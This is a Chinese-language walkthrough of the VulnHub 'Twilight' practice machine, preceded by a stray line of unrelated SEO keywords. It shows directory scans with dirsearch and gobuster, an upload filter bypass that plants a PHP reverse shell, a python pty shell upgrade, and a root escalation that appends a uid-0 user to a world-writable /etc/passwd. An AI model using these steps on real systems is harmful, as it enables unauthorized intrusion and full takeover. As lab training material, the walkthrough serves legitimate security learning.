搬瓦工可以长期做网站,如何自己做淘宝客推广网站,如何建设网站功能设计,手机如何登录wordpressTWILIGHT靶场详解
下载地址#xff1a;https://download.vulnhub.com/sunset/twilight.7z
这是一个比较简单的靶场#xff0c;拿到IP后我们扫描发现开启了超级多的端口
其实这些端口一点用都没有#xff0c;在我的方法中
但是也有不同的方法可以拿权限#xff0c;就需要…TWILIGHT靶场详解
下载地址https://download.vulnhub.com/sunset/twilight.7z
这是一个比较简单的靶场拿到IP后我们扫描发现开启了超级多的端口
其实这些端口一点用都没有在我的方法中
但是也有不同的方法可以拿权限就需要这些开放的服务了 扫描目录时候我们发现有一个文件上传的目录只能上传图片。
dirsearch -u http://192.168.102.199/gallery/但是我们抓包的时候可以上传PHP文件然后修改成图片类型。 这样就能上传一个反弹shell 然后我有扫描了一下上传后文件所在的目录这里用了一个大字典扫描小字典扫描不到。
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -u http://192.168.102.199/gallery/ 点击我们上传的php文件下面那个也是我上传的。 这样我们kali就拿到了一个webshell 利用python3美化一下命令行同时也提高了权限。
python3 -c import pty;pty.spawn(/bin/bash)查看passwd文件的时候发现这个文件是所有人可读可写的。
我们就可以利用这个漏洞插入一个新用户。 利用下面命令我们就可以插入一个新的有root权限的用户密码需要加密我们用openssl工具可以加密对应的账号密码。
echo tang:$1$tang$pBxlp5xZvZzeAXxc4Ki/v0:0:0:root:/root:/bin/bash /etc/passwdsu tang登陆新用户发现就是root权限了。